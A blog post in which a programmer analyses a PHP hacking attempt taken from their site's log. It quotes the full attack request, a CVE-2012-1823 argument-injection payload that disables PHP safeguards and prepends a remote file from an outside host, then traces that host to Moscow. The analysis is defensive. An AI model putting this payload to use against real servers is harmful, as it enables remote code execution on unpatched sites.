Update: More information about this attack is now available from SANS: PHP vulnerability CVE-2012-1823 being exploited in the wild
I filed this one under "programming" because at some point in their career every programmer will be asked to investigate suspicious activities. In all likelihood they have received zero training on how to do something like this. Although I did my master's thesis on artificial intelligence for network intrusion detection I hardly consider myself a security expert.
Still I've been on the receiving end of many "hey could you take a look at this?" requests, usually for web traffic coming from a country that's a known haven for hackers. Yes, I know that most of the LulzSec hackers were arrested here in the United States. The key word there is "arrested", none of them are currently openly running fake anti-virus sites with authorities from their government looking the other way. We're plenty screwed-up over here but we sure excel at jailing people.
The other day I caught a PHP hacking attempt against this site that I thought was worth exploring a little bit. I probably get hit with 2-3 attempts from botnets a day and they all look pretty much the same, mundane stuff like "GET /phpMyAdmin/index.php ". I don't run PHP on this site, everything is plain HTML+JavaScript because I'm old-school like that. Plus I get to debug web and applications servers enough at work already. So for me these attacks are more amusing than concerning.
Anyway, this particular attack was not only different but not found on Google. So this is either something new or experimental, that's what makes it interesting.
It started with the following request:
74.242.228.35
[18/May/2012:10:48:16 -0700]
"GET /index.php?
-dsafe_mode%3dOff
+-ddisable_functions%3dNULL
+-dallow_url_fopen%3dOn
+-dallow_url_include%3dOn
+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
HTTP/1.1"
404 1803 "-" "
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
I have light experience with PHP but can tell right away what this is trying to do. This request is hoping that you've unsecured your site to the point where an unauthenticated internet user can change PHP settings. If so it's going to disable security, allow some stuff you usually would turn off, and then inject some additional content on your index.
At first I figured this was just some script kiddie who I could report to their ISP if I felt like burning a couple calories. The source IP address resolves to AT&T in North Carolina so this theory held up for a second. Then I looked at the browser string one more time - Windows 2000 running Internet Explorer 6. So either we have a 12 year-old PC someone built for their grandparents to check email on or a bot that's using a fake user agent string. A very quick Google search reveals a dozen different bots using this string.
The real giveaway though is the IP address it's trying to import a file from - 81.17.24.82. Golly gee Beaver, I wonder what country that could possibly resolve to?
IP address: 81.17.24.82
Reverse DNS: [No reverse DNS entry per dns01.privatelayer.com.]
Reverse DNS authenticity: [Unknown]
ASN: 35153
ASN Name: RELIANS (ISP Relians, Moscow, Russia)
IP range connectivity: 9
Registrar (per ASN): RIPE
Country (per IP registrar): EU [EU]
Country Currency: EUR [euros]
Country IP Range: 81.17.16.0 to 81.17.31.255
Country fraud profile: Normal
City (per outside source): Moscow, Moskva
Country (per outside source): RU [Russian Federation]
Private (internal) IP? No
IP address registrar: whois.ripe.net
Known Proxy? No
Link for WHOIS: 81.17.24.82
Related